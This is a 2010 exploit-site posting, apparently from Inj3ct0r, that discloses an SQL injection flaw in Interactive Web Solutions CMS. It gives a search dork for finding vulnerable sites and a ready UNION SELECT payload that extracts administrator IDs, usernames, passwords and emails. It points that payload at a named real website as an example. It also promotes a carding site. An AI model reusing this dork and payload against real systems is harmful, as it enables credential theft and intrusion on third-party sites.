[webapps / 0day] - Interactive Web Solutions CMS SQL Injecti
Posted on 15 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Interactive Web Solutions CMS SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Dr.0rYX' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>========================================================= Interactive Web Solutions CMS SQL Injection Vulnerability ========================================================= * EDB-ID: * CVE: * OSVDB-ID: * Author: Dr.0rYX and Cr3w-DZ * Published: * Verified: * Exploit Code: * Vulnerable App: **************************************************************************************************** * _______ ___________.__ ___________ .__ * * ____ _ \______\__ ___/| |__ _____ \_ _____/______|__| ____ _____ * * / / /_ \_ __ | | | | ______ \__ | __) \_ __ |/ ___\__ * * | | \_/ | /| | | Y /_____/ / __ \_| | | / \___ / __ \_ * * |___| /\_____ /__| |____| |___| / (____ /\___ / |__| |__|\___ >____ / * * / / / / / / / * * .__ __ __ * * ______ ____ ____ __ _________|__|/ |_ ___.__. _/ |_ ____ _____ _____ * * / ___// __ \_/ ___| | \_ __ __< | | __/ __ \__ / * * \___ \ ___/ \___| | /| | / || | \___ | | | ___/ / __ | Y Y * * /____ >\___ >\___ >____/ |__| |__||__| / ____| |__| \___ >____ /__|_| / * * / / / / / / / * * Pr!v8 Expl0iT AND t00l ** * * ALGERIAN HACKERS * *********************************- NORTH-AFRICA SECURITY TEAM -************************************* [!] Interactive Web Solutions CMS SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de<mailto:vx3@hotmail.de> & Cr3w@hotmail.de<mailto:Cr3w@hotmail.de> WWW.carding-zone.com ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.iwswebsolutions.com/ [+] script : Interactive Web Solutions CMS [+] Download :http://www.iwswebsolutions.com/contact_us_interactive_website_solutions.html (sell script ) [+] Vulnerability : remote SQL injection [+] Dork : inurl:"site_info.php?siid=" Interactive Web Solutions **************************************************************************/ [ Vulnerable File ] http://server/site_info.php?siid=[N.A.S.T ] [ Exploit ] http://server/site_info.php?siid=-4+union+select+1,2,3,4,5,6,7,concat(admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_email),9,10,11+from+tadmin-- [ ExAMPLE ] http://www.globalmediaconcierge.com/site_info.php?siid=-4+union+select+1,2,3,4,5,6,7,concat(admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_email),9,10,11+from+tadmin-- [ GReetz ] [+] :clAw from www.carding-zone.com ,By_aGResiF , MILOR123 , inj3ct0r.com , exploit-db.com , ALL HACKERS MUSLIMS # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-15]</pre></body></html>
